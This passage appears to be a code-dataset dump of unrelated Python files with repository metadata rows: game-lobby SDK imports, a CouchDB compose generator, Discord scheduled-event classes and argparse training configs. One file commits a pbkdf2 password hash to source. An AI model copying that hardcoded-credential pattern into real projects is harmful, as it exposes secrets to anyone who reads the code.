from ._config import admin_get_config_v1_async
from ._config import admin_import_config_v1
from ._config import admin_import_config_v1_async
from ._config import admin_update_config_v1
from ._config import admin_update_config_v1_async
from ._friends import add_friends_without_confirmation
from ._friends import add_friends_without_confirmation_async
from ._friends import get_list_of_friends
from ._friends import get_list_of_friends_async
from ._friends import get_user_friends_updated
from ._friends import get_user_friends_updated_async
from ._friends import get_user_incoming_friends
from ._friends import get_user_incoming_friends_async
from ._friends import get_user_outgoing_friends
from ._friends import get_user_outgoing_friends_async
from ._friends import user_accept_friend_request
from ._friends import user_accept_friend_request_async
from ._friends import user_cancel_friend_request
from ._friends import user_cancel_friend_request_async
from ._friends import user_get_friendship_status
from ._friends import user_get_friendship_status_async
from ._friends import user_reject_friend_request
from ._friends import user_reject_friend_request_async
from ._friends import user_request_friend
from ._friends import user_request_friend_async
from ._friends import user_unfriend_request
from ._friends import user_unfriend_request_async
from ._lobby_operations import admin_join_party_v1
from ._lobby_operations import admin_join_party_v1_async
from ._lobby_operations import admin_update_party_attributes_v1
from ._lobby_operations import admin_update_party_attributes_v1_async
from ._lobby_operations import public_get_messages
from ._lobby_operations import public_get_messages_async
from ._notification import create_notification_template_v1_admin
from ._notification import create_notification_template_v1_admin_async
from ._notification import create_notification_topic_v1_admin
from ._notification import create_notification_topic_v1_admin_async
from ._notification import create_template
from ._notification import create_template_async
from ._notification import create_topic
from ._notification import create_topic_async
from ._notification import delete_notification_template_slug_v1_admin
from ._notification import delete_notification_template_slug_v1_admin_async
from ._notification import delete_notification_topic_v1_admin
from ._notification import delete_notification_topic_v1_admin_async
from ._notification import delete_template_localization
from ._notification import delete_template_localization_async
from ._notification import delete_template_localization_v1_admin
from ._notification import delete_template_localization_v1_admin_async
from ._notification import delete_template_slug
from ._notification import delete_template_slug_async
from ._notification import delete_topic_by_topic_name
from ._notification import delete_topic_by_topic_name_async
from ._notification import free_form_notification
from ._notification import free_form_notification_async
from ._notification import free_form_notification_by_user_id
from ._notification import free_form_notification_by_user_id_async
from ._notification import get_all_notification_templates_v1_admin
from ._notification import get_all_notification_templates_v1_admin_async
from ._notification import get_all_notification_topics_v1_admin
from ._notification import get_all_notification_topics_v1_admin_async
from ._notification import get_game_template
from ._notification import get_game_template_async
from ._notification import get_localization_template
from ._notification import get_localization_template_async
from ._notification import get_notification_topic_v1_admin
from ._notification import get_notification_topic_v1_admin_async
from ._notification import get_single_template_localization_v1_admin
from ._notification import get_single_template_localization_v1_admin_async
from ._notification import get_slug_template
from ._notification import get_slug_template_async
from ._notification import get_template_slug_localizations_template_v1_admin
from ._notification import get_template_slug_localizations_template_v1_admin_async
from ._notification import get_topic_by_namespace
from ._notification import get_topic_by_namespace_async
from ._notification import get_topic_by_topic_name
from ._notification import get_topic_by_topic_name_async
from ._notification import notification_with_template
from ._notification import notification_with_template_async
from ._notification import notification_with_template_by_user_id
from ._notification import notification_with_template_by_user_id_async
from ._notification import publish_template
from ._notification import publish_template_async
from ._notification import publish_template_localization_v1_admin
from ._notification import publish_template_localization_v1_admin_async
from ._notification import send_multiple_users_freeform_notification_v1_admin
from ._notification import send_multiple_users_freeform_notification_v1_admin_async
from ._notification import send_party_freeform_notification_v1_admin
from ._notification import send_party_freeform_notification_v1_admin_async
from ._notification import send_party_templated_notification_v1_admin
from ._notification import send_party_templated_notification_v1_admin_async
from ._notification import send_specific_user_freeform_notification_v1_admin
from ._notification import send_specific_user_freeform_notification_v1_admin_async
from ._notification import send_specific_user_templated_notification_v1_admin
from ._notification import send_specific_user_templated_notification_v1_admin_async
from ._notification import send_users_freeform_notification_v1_admin
from ._notification import send_users_freeform_notification_v1_admin_async
from ._notification import send_users_templated_notification_v1_admin
from ._notification import send_users_templated_notification_v1_admin_async
from ._notification import update_localization_template
from ._notification import update_localization_template_async
from ._notification import update_notification_topic_v1_admin
from ._notification import update_notification_topic_v1_admin_async
from ._notification import update_template_localization_v1_admin
from ._notification import update_template_localization_v1_admin_async
from ._notification import update_topic_by_topic_name
from ._notification import update_topic_by_topic_name_async
from ._party import admin_get_party_data_v1
from ._party import admin_get_party_data_v1_async
from ._party import admin_get_user_party_v1
from ._party import admin_get_user_party_v1_async
from ._party import public_get_party_data_v1
from ._party import public_get_party_data_v1_async
from ._party import public_set_party_limit_v1
from ._party import public_set_party_limit_v1_async
from ._party import public_update_party_attributes_v1
from ._party import public_update_party_attributes_v1_async
from ._player import admin_bulk_block_players_v1
from ._player import admin_bulk_block_players_v1_async
from ._player import admin_get_all_player_session_attribute
from ._player import admin_get_all_player_session_attribute_async
from ._player import admin_get_lobby_ccu
from ._player import admin_get_lobby_ccu_async
from ._player import admin_get_player_blocked_by_players_v1
from ._player import admin_get_player_blocked_by_players_v1_async
from ._player import admin_get_player_blocked_players_v1
from ._player import admin_get_player_blocked_players_v1_async
from ._player import admin_get_player_session_attribute
from ._player import admin_get_player_session_attribute_async
from ._player import admin_set_player_session_attribute
from ._player import admin_set_player_session_attribute_async
from ._player import public_get_player_blocked_by_players_v1
from ._player import public_get_player_blocked_by_players_v1_async
from ._player import public_get_player_blocked_players_v1
from ._player import public_get_player_blocked_players_v1_async
from ._presence import users_presence_handler_v1
from ._presence import users_presence_handler_v1_async
from ._profanity import admin_add_profanity_filter_into_list
from ._profanity import admin_add_profanity_filter_into_list_async
from ._profanity import admin_add_profanity_filters
from ._profanity import admin_add_profanity_filters_async
from ._profanity import admin_create_profanity_list
from ._profanity import admin_create_profanity_list_async
from ._profanity import admin_debug_profanity_filters
from ._profanity import admin_debug_profanity_filters_async
from ._profanity import admin_delete_profanity_filter
from ._profanity import admin_delete_profanity_filter_async
from ._profanity import admin_delete_profanity_list
from ._profanity import admin_delete_profanity_list_async
from ._profanity import admin_get_profanity_list_filters_v1
from ._profanity import admin_get_profanity_list_filters_v1_async
from ._profanity import admin_get_profanity_lists
from ._profanity import admin_get_profanity_lists_async
from ._profanity import admin_get_profanity_rule
from ._profanity import admin_get_profanity_rule_async
from ._profanity import admin_import_profanity_filters_from_file
from ._profanity import admin_import_profanity_filters_from_file_async
from ._profanity import admin_set_profanity_rule_for_namespace
from ._profanity import admin_set_profanity_rule_for_namespace_async
from ._profanity import admin_update_profanity_list
from ._profanity import admin_update_profanity_list_async
from ._profanity import admin_verify_message_profanity_response
from ._profanity import admin_verify_message_profanity_response_async
from ._third_party import admin_create_third_party_config
from ._third_party import admin_create_third_party_config_async
from ._third_party import admin_delete_third_party_config
from ._third_party import admin_delete_third_party_config_async
from ._third_party import admin_get_third_party_config
from ._third_party import admin_get_third_party_config_async
from ._third_party import admin_update_third_party_config
from ._third_party import admin_update_third_party_config_async
| 53.086538 | 83 | 0.906991 | 1,563 | 11,042 | 5.784389 | 0.088292 | 0.089592 | 0.180069 | 0.110497 | 0.960181 | 0.938392 | 0.852561 | 0.608008 | 0.35328 | 0.105187 | 0 | 0.008203 | 0.072632 | 11,042 | 207 | 84 | 53.342995 | 0.874707 | 0.032693 | 0 | 0 | 1 | 0 | 0.003093 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.983784 | 0 | 0.983784 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
1779c4b3a676a8733d7f6e73850ab88ee7211bca | 25 | py | Python | hello.py | action-li/python1808 | fcd1bee39227f034fd07bf3ef608f10fd7d39350 | [
"Apache-2.0"
] | null | null | null | hello.py | action-li/python1808 | fcd1bee39227f034fd07bf3ef608f10fd7d39350 | [
"Apache-2.0"
] | null | null | null | hello.py | action-li/python1808 | fcd1bee39227f034fd07bf3ef608f10fd7d39350 | [
"Apache-2.0"
] | null | null | null | print('123')
print('456') | 12.5 | 12 | 0.64 | 4 | 25 | 4 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.25 | 0.04 | 25 | 2 | 13 | 12.5 | 0.416667 | 0 | 0 | 0 | 0 | 0 | 0.230769 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
bd7cf88c522ba9d725edcbee8d6dcbdeca80db01 | 104 | py | Python | programs_integrator/config/__init__.py | artudi54/programs-integrator | e86bdebb3e63bf02fbc6923cf3b6efe916147a58 | [
"MIT"
] | 2 | 2019-03-19T09:41:32.000Z | 2020-06-09T22:33:04.000Z | programs_integrator/config/__init__.py | artudi54/programs-integrator | e86bdebb3e63bf02fbc6923cf3b6efe916147a58 | [
"MIT"
] | null | null | null | programs_integrator/config/__init__.py | artudi54/programs-integrator | e86bdebb3e63bf02fbc6923cf3b6efe916147a58 | [
"MIT"
] | null | null | null | from programs_integrator.config.Config import *
from programs_integrator.config.ApplicationDir import *
| 34.666667 | 55 | 0.865385 | 12 | 104 | 7.333333 | 0.5 | 0.272727 | 0.5 | 0.636364 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.076923 | 104 | 2 | 56 | 52 | 0.916667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
bde768c8a29e32247eb0e3f29c671a42f08cec10 | 62 | py | Python | spkeras/utils/__init__.py | mervess/spkeras | 7e127569cbab0c7c0dfeb7ff5a091e63b75ce7b0 | [
"MIT"
] | 12 | 2021-05-17T15:07:31.000Z | 2022-03-11T14:25:51.000Z | spkeras/utils/__init__.py | mervess/spkeras | 7e127569cbab0c7c0dfeb7ff5a091e63b75ce7b0 | [
"MIT"
] | 3 | 2021-06-20T15:24:05.000Z | 2021-12-03T15:39:58.000Z | spkeras/utils/__init__.py | mervess/spkeras | 7e127569cbab0c7c0dfeb7ff5a091e63b75ce7b0 | [
"MIT"
] | 2 | 2021-08-03T09:59:47.000Z | 2021-11-21T23:21:48.000Z | from .utils import save_pickle
from .utils import load_pickle
| 20.666667 | 30 | 0.83871 | 10 | 62 | 5 | 0.6 | 0.36 | 0.6 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.129032 | 62 | 2 | 31 | 31 | 0.925926 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
da14cc747cb4e8adbae3f33f2594412729d08702 | 43 | py | Python | mak/libs/pyxx/cxx/grammar/expression/primary/lambda_expr/__init__.py | motor-dev/Motor | 98cb099fe1c2d31e455ed868cc2a25eae51e79f0 | [
"BSD-3-Clause"
] | 4 | 2015-05-13T16:28:36.000Z | 2017-05-24T15:34:14.000Z | mak/libs/pyxx/cxx/grammar/expression/primary/lambda_expr/__init__.py | motor-dev/Motor | 98cb099fe1c2d31e455ed868cc2a25eae51e79f0 | [
"BSD-3-Clause"
] | null | null | null | mak/libs/pyxx/cxx/grammar/expression/primary/lambda_expr/__init__.py | motor-dev/Motor | 98cb099fe1c2d31e455ed868cc2a25eae51e79f0 | [
"BSD-3-Clause"
] | 1 | 2017-03-21T08:28:07.000Z | 2017-03-21T08:28:07.000Z | from . import capture
from . import general | 21.5 | 21 | 0.790698 | 6 | 43 | 5.666667 | 0.666667 | 0.588235 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.162791 | 43 | 2 | 22 | 21.5 | 0.944444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
da33d10e851c47ce0925f4d6a5bf3a1cdf2ab9dc | 93 | py | Python | parameters_8003.py | helloiloveit/learnWord | 21d6bac03f8b7415d4f71720a07536f8050af51a | [
"BSD-3-Clause"
] | null | null | null | parameters_8003.py | helloiloveit/learnWord | 21d6bac03f8b7415d4f71720a07536f8050af51a | [
"BSD-3-Clause"
] | null | null | null | parameters_8003.py | helloiloveit/learnWord | 21d6bac03f8b7415d4f71720a07536f8050af51a | [
"BSD-3-Clause"
] | null | null | null | password="pbkdf2(1000,20,sha512)$96c9299fd8ff1ff7$0dbe18e7e1c5246a64a20eab7beda23fb1309b45"
| 46.5 | 92 | 0.88172 | 7 | 93 | 11.714286 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.450549 | 0.021505 | 93 | 1 | 93 | 93 | 0.450549 | 0 | 0 | 0 | 0 | 0 | 0.869565 | 0.869565 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
e59f2dd6d79215a253818c279cc66775a82917f3 | 5,140 | py | Python | utils/produce_db.py | JordiSubira/DGBP | f1b670e3d831f993ed0383d7ec79d2ba03d1a4e1 | [
"Apache-2.0"
] | null | null | null | utils/produce_db.py | JordiSubira/DGBP | f1b670e3d831f993ed0383d7ec79d2ba03d1a4e1 | [
"Apache-2.0"
] | null | null | null | utils/produce_db.py | JordiSubira/DGBP | f1b670e3d831f993ed0383d7ec79d2ba03d1a4e1 | [
"Apache-2.0"
] | 1 | 2019-04-18T03:08:48.000Z | 2019-04-18T03:08:48.000Z | import yaml
'''
couchdb0:
container_name: couchdb0
image: hyperledger/fabric-couchdb
# Populate the COUCHDB_USER and COUCHDB_PASSWORD to set an admin user and password
# for CouchDB. This will prevent CouchDB from operating in an "Admin Party" mode.
environment:
- COUCHDB_USER=
- COUCHDB_PASSWORD=
# Comment/Uncomment the port mapping if you want to hide/expose the CouchDB service,
# for example map it to utilize Fauxton User Interface in dev environments.
ports:
- "5984:5984"
networks:
- byfn
peer0.org1.example.com:
environment:
- CORE_LEDGER_STATE_STATEDATABASE=CouchDB
- CORE_LEDGER_STATE_COUCHDBCONFIG_COUCHDBADDRESS=couchdb0:5984
# The CORE_LEDGER_STATE_COUCHDBCONFIG_USERNAME and CORE_LEDGER_STATE_COUCHDBCONFIG_PASSWORD
# provide the credentials for ledger to connect to CouchDB. The username and password must
# match the username and password set for the associated CouchDB.
- CORE_LEDGER_STATE_COUCHDBCONFIG_USERNAME=
- CORE_LEDGER_STATE_COUCHDBCONFIG_PASSWORD=
depends_on:
- couchdb0
couchdb1:
container_name: couchdb1
image: hyperledger/fabric-couchdb
# Populate the COUCHDB_USER and COUCHDB_PASSWORD to set an admin user and password
# for CouchDB. This will prevent CouchDB from operating in an "Admin Party" mode.
environment:
- COUCHDB_USER=
- COUCHDB_PASSWORD=
# Comment/Uncomment the port mapping if you want to hide/expose the CouchDB service,
# for example map it to utilize Fauxton User Interface in dev environments.
ports:
- "6984:5984"
networks:
- byfn
peer1.org1.example.com:
environment:
- CORE_LEDGER_STATE_STATEDATABASE=CouchDB
- CORE_LEDGER_STATE_COUCHDBCONFIG_COUCHDBADDRESS=couchdb1:5984
# The CORE_LEDGER_STATE_COUCHDBCONFIG_USERNAME and CORE_LEDGER_STATE_COUCHDBCONFIG_PASSWORD
# provide the credentials for ledger to connect to CouchDB. The username and password must
# match the username and password set for the associated CouchDB.
- CORE_LEDGER_STATE_COUCHDBCONFIG_USERNAME=
- CORE_LEDGER_STATE_COUCHDBCONFIG_PASSWORD=
depends_on:
- couchdb1
'''
port_base = 5984
for i in range(0, 10):
    peer0 = 'peer0.org' + str(i+1) + '.example.com'
    peer1 = 'peer1.org' + str(i+1) + '.example.com'
    port0 = port_base + i*2000
    port1 = port_base + i*2000 + 1000
    couchdb0 = 'couchdb' + str(i*2)
    couchdb1 = 'couchdb' + str(i*2+1)
    datapeer0 = {
        peer0: {
            'environment': ['CORE_LEDGER_STATE_STATEDATABASE=CouchDB',
                            'CORE_LEDGER_STATE_COUCHDBCONFIG_COUCHDBADDRESS=couchdb' + str(i*2) + ':5984',
                            'CORE_LEDGER_STATE_COUCHDBCONFIG_USERNAME=',
                            'CORE_LEDGER_STATE_COUCHDBCONFIG_PASSWORD='],
            'depends_on': [couchdb0]
        }
    }
    datapeer1 = {
        peer1: {
            'environment': ['CORE_LEDGER_STATE_STATEDATABASE=CouchDB',
                            'CORE_LEDGER_STATE_COUCHDBCONFIG_COUCHDBADDRESS=couchdb' + str(i*2+1) + ':5984',
                            'CORE_LEDGER_STATE_COUCHDBCONFIG_USERNAME=',
                            'CORE_LEDGER_STATE_COUCHDBCONFIG_PASSWORD='],
            'depends_on': [couchdb1]
        }
    }
    couchdb0 = {
        couchdb0: {
            'container_name': couchdb0,
            'image': 'hyperledger/fabric-couchdb',
            'environment': ['COUCHDB_USER=',
                            'COUCHDB_PASSWORD='],
            'networks': ['byfn'],
            'ports': [str(port0) + ':5984']
        }
    }
    couchdb1 = {
        couchdb1: {
            'container_name': couchdb1,
            'image': 'hyperledger/fabric-couchdb',
            'environment': ['COUCHDB_USER=',
                            'COUCHDB_PASSWORD='],
            'networks': ['byfn'],
            'ports': [str(port1) + ':5984']
        }
    }
    with open('db.yml', 'a') as outfile:
        yaml.dump(couchdb0, outfile, default_flow_style=False)
        yaml.dump(datapeer0, outfile, default_flow_style=False)
        yaml.dump(couchdb1, outfile, default_flow_style=False)
        yaml.dump(datapeer1, outfile, default_flow_style=False) | 34.039735 | 97 | 0.680934 | 569 | 5,140 | 5.896309 | 0.173989 | 0.083458 | 0.125186 | 0.183607 | 0.912668 | 0.890611 | 0.879881 | 0.84769 | 0.819374 | 0.819374 | 0 | 0.035265 | 0.211089 | 5,140 | 151 | 98 | 34.039735 | 0.792109 | 0 | 0 | 0.269231 | 0 | 0 | 0.391155 | 0.230902 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.076923 | 0.019231 | 0 | 0.019231 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8
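For each org, the loop above emits two CouchDB services (`couchdb{2i}` and `couchdb{2i+1}`), wires `peer0`/`peer1` to them, and maps host ports `5984 + i*2000` and `5984 + i*2000 + 1000`. A self-contained sketch of that naming/port scheme — the `couch_layout` helper below is hypothetical, not part of the script:

```python
def couch_layout(i):
    # Mirrors the per-org naming and host-port arithmetic used by the loop.
    return {
        'peers': ('peer0.org%d.example.com' % (i + 1),
                  'peer1.org%d.example.com' % (i + 1)),
        'couchdbs': ('couchdb%d' % (i * 2), 'couchdb%d' % (i * 2 + 1)),
        'host_ports': (5984 + i * 2000, 5984 + i * 2000 + 1000),
    }

layout = couch_layout(1)  # second org: couchdb2/couchdb3 on ports 7984/8984
```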
daa0d8522fe4f972ad8a65a36bd782dbfc010aaa | 3,860 | py | Python | hata/discord/scheduled_event/event_types.py | albertopoljak/hata | 96d0b3182eb4f5291eaf36bd23d521787c6b01f1 | [
"0BSD"
] | null | null | null | hata/discord/scheduled_event/event_types.py | albertopoljak/hata | 96d0b3182eb4f5291eaf36bd23d521787c6b01f1 | [
"0BSD"
] | null | null | null | hata/discord/scheduled_event/event_types.py | albertopoljak/hata | 96d0b3182eb4f5291eaf36bd23d521787c6b01f1 | [
"0BSD"
] | 1 | 2020-09-17T20:10:15.000Z | 2020-09-17T20:10:15.000Z | __all__ = ('ScheduledEventSubscribeEvent', 'ScheduledEventUnsubscribeEvent')
from ..bases import EventBase
class ScheduledEventSubscribeEvent(EventBase):
    """
    Represents a `GUILD_SCHEDULED_EVENT_USER_ADD` event.

    Attributes
    ----------
    guild_id : `int`
        The guild's identifier, where the event will be.
    scheduled_event_id : `int`
        The scheduled event's identifier.
    user_id : `int`
        The identifier of the user, who subscribed to the event.
    """
    __slots__ = ('guild_id', 'scheduled_event_id', 'user_id', )

    def __new__(cls, data):
        """
        Creates a new scheduled event subscribe event from the given data.

        Parameters
        ----------
        data : `dict` of (`str`, `Any`) items
            Scheduled event subscribe event data.
        """
        guild_id = int(data['guild_id'])
        scheduled_event_id = int(data['guild_scheduled_event_id'])
        user_id = int(data['user_id'])

        self = object.__new__(cls)
        self.guild_id = guild_id
        self.scheduled_event_id = scheduled_event_id
        self.user_id = user_id
        return self

    def __repr__(self):
        """Returns the representation of the scheduled event subscribe event."""
        repr_parts = [
            '<',
            self.__class__.__name__,
            ' guild_id=',
            repr(self.guild_id),
            ', scheduled_event_id=',
            repr(self.scheduled_event_id),
            ', user_id=',
            repr(self.user_id),
            '>'
        ]
        return ''.join(repr_parts)

    def __len__(self):
        """Helper for unpacking if needed."""
        return 3

    def __iter__(self):
        """
        Unpacks the scheduled event subscribe event.

        This method is a generator.
        """
        yield self.guild_id
        yield self.scheduled_event_id
        yield self.user_id
class ScheduledEventUnsubscribeEvent(EventBase):
    """
    Represents a `GUILD_SCHEDULED_EVENT_USER_REMOVE` event.

    Attributes
    ----------
    guild_id : `int`
        The guild's identifier, where the event will be.
    scheduled_event_id : `int`
        The scheduled event's identifier.
    user_id : `int`
        The identifier of the user, who unsubscribed from the event.
    """
    __slots__ = ('guild_id', 'scheduled_event_id', 'user_id', )

    def __new__(cls, data):
        """
        Creates a new scheduled event unsubscribe event from the given data.

        Parameters
        ----------
        data : `dict` of (`str`, `Any`) items
            Scheduled event unsubscribe event data.
        """
        guild_id = int(data['guild_id'])
        scheduled_event_id = int(data['guild_scheduled_event_id'])
        user_id = int(data['user_id'])

        self = object.__new__(cls)
        self.guild_id = guild_id
        self.scheduled_event_id = scheduled_event_id
        self.user_id = user_id
        return self

    def __repr__(self):
        """Returns the representation of the scheduled event unsubscribe event."""
        repr_parts = [
            '<',
            self.__class__.__name__,
            ' guild_id=',
            repr(self.guild_id),
            ', scheduled_event_id=',
            repr(self.scheduled_event_id),
            ', user_id=',
            repr(self.user_id),
            '>'
        ]
        return ''.join(repr_parts)

    def __len__(self):
        """Helper for unpacking if needed."""
        return 3

    def __iter__(self):
        """
        Unpacks the scheduled event unsubscribe event.

        This method is a generator.
        """
        yield self.guild_id
        yield self.scheduled_event_id
        yield self.user_id
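A minimal, self-contained sketch of how such an event behaves in practice — building it from a raw gateway payload and unpacking it. The class below is a stand-in that mirrors the parsing logic above, not the actual hata import:

```python
class SubscribeEventSketch:
    """Stand-in mirroring ScheduledEventSubscribeEvent's parsing and unpacking."""
    __slots__ = ('guild_id', 'scheduled_event_id', 'user_id')

    def __init__(self, data):
        # Discord sends snowflake ids as strings; convert them to int.
        self.guild_id = int(data['guild_id'])
        self.scheduled_event_id = int(data['guild_scheduled_event_id'])
        self.user_id = int(data['user_id'])

    def __len__(self):
        return 3

    def __iter__(self):
        yield self.guild_id
        yield self.scheduled_event_id
        yield self.user_id

payload = {'guild_id': '10', 'guild_scheduled_event_id': '20', 'user_id': '30'}
# Tuple-unpacking works because the event yields its three fields in order.
guild_id, scheduled_event_id, user_id = SubscribeEventSketch(payload)
```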
| 27.769784 | 82 | 0.560622 | 413 | 3,860 | 4.861985 | 0.162228 | 0.223108 | 0.159363 | 0.071713 | 0.888446 | 0.868526 | 0.868526 | 0.825697 | 0.825697 | 0.825697 | 0 | 0.000782 | 0.337824 | 3,860 | 138 | 83 | 27.971014 | 0.78482 | 0.326943 | 0 | 0.903226 | 0 | 0 | 0.126816 | 0.046675 | 0 | 0 | 0 | 0 | 0 | 1 | 0.129032 | false | 0 | 0.016129 | 0 | 0.306452 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
977ca0fb6dba3f2e340650764101792fff2f96b8 | 15,861 | py | Python | code/config.py | liuqiangh/NeuCFlow | 438484ffcf51964fcb68f671b83fd58060fde1f1 | [
"Apache-2.0"
] | null | null | null | code/config.py | liuqiangh/NeuCFlow | 438484ffcf51964fcb68f671b83fd58060fde1f1 | [
"Apache-2.0"
] | null | null | null | code/config.py | liuqiangh/NeuCFlow | 438484ffcf51964fcb68f671b83fd58060fde1f1 | [
"Apache-2.0"
] | null | null | null | import argparse
# FB237
def get_fb237_config(parser):
    parser.add_argument('--dataset', default='FB237')
    parser.add_argument('--n_dims_sm', type=int, default=50)
    parser.add_argument('--n_dims', type=int, default=100)
    parser.add_argument('--batch_size', type=int, default=80)
    parser.add_argument('--max_edges_per_example', type=int, default=10000)
    parser.add_argument('--max_edges_per_node', type=int, default=200)
    parser.add_argument('--max_attended_nodes', type=int, default=20)
    parser.add_argument('--max_seen_nodes', type=int, default=200)
    parser.add_argument('--test_batch_size', type=int, default=80)
    parser.add_argument('--test_max_edges_per_example', type=int, default=10000)
    parser.add_argument('--test_max_edges_per_node', type=int, default=200)
    parser.add_argument('--test_max_attended_nodes', type=int, default=20)
    parser.add_argument('--test_max_seen_nodes', type=int, default=200)
    parser.add_argument('--n_layers', type=int, default=2)
    parser.add_argument('--aggregate_op', default='mean_v3')
    parser.add_argument('--uncon_steps', type=int, default=2)
    parser.add_argument('--con_steps', type=int, default=6)
    parser.add_argument('--max_epochs', type=int, default=1)
    parser.add_argument('--learning_rate', type=float, default=0.001)
    parser.add_argument('--clipnorm', type=float, default=1.)
    parser.add_argument('--remove_all_head_tail_edges', action='store_true', default=True)
    parser.add_argument('--timer', action='store_true', default=False)
    parser.add_argument('--print_train', action='store_true', default=True)
    parser.add_argument('--print_train_metric', action='store_true', default=True)
    parser.add_argument('--print_train_freq', type=int, default=1)
    parser.add_argument('--eval_within_epoch', default=[])
    parser.add_argument('--eval_valid', action='store_true', default=False)
    parser.add_argument('--moving_mean_decay', type=float, default=0.99)
    parser.add_argument('--test_output_attention', action='store_true', default=False)
    parser.add_argument('--test_analyze_attention', action='store_true', default=False)
    return parser
# FB15K
def get_fb15k_config(parser):
    parser.add_argument('--dataset', default='FB15K')
    parser.add_argument('--n_dims_sm', type=int, default=50)
    parser.add_argument('--n_dims', type=int, default=100)
    parser.add_argument('--batch_size', type=int, default=80)
    parser.add_argument('--max_edges_per_example', type=int, default=10000)
    parser.add_argument('--max_edges_per_node', type=int, default=200)
    parser.add_argument('--max_attended_nodes', type=int, default=20)
    parser.add_argument('--max_seen_nodes', type=int, default=200)
    parser.add_argument('--test_batch_size', type=int, default=80)
    parser.add_argument('--test_max_edges_per_example', type=int, default=10000)
    parser.add_argument('--test_max_edges_per_node', type=int, default=200)
    parser.add_argument('--test_max_attended_nodes', type=int, default=20)
    parser.add_argument('--test_max_seen_nodes', type=int, default=200)
    parser.add_argument('--n_layers', type=int, default=2)
    parser.add_argument('--aggregate_op', default='mean_v3')
    parser.add_argument('--uncon_steps', type=int, default=1)
    parser.add_argument('--con_steps', type=int, default=6)
    parser.add_argument('--max_epochs', type=int, default=1)
    parser.add_argument('--learning_rate', type=float, default=0.001)
    parser.add_argument('--clipnorm', type=float, default=1.)
    parser.add_argument('--remove_all_head_tail_edges', action='store_true', default=False)
    parser.add_argument('--timer', action='store_true', default=False)
    parser.add_argument('--print_train', action='store_true', default=True)
    parser.add_argument('--print_train_metric', action='store_true', default=True)
    parser.add_argument('--print_train_freq', type=int, default=1)
    parser.add_argument('--eval_within_epoch', default=[])
    parser.add_argument('--eval_valid', action='store_true', default=False)
    parser.add_argument('--moving_mean_decay', type=float, default=0.99)
    parser.add_argument('--test_output_attention', action='store_true', default=False)
    parser.add_argument('--test_analyze_attention', action='store_true', default=False)
    return parser
# OP
def get_op_config(parser):
    parser.add_argument('--dataset', default='OP')
    parser.add_argument('--n_dims_sm', type=int, default=50)
    parser.add_argument('--n_dims', type=int, default=100)
    parser.add_argument('--batch_size', type=int, default=80)
    parser.add_argument('--max_edges_per_example', type=int, default=10000)
    parser.add_argument('--max_edges_per_node', type=int, default=200)
    parser.add_argument('--max_attended_nodes', type=int, default=20)
    parser.add_argument('--max_seen_nodes', type=int, default=200)
    parser.add_argument('--test_batch_size', type=int, default=80)
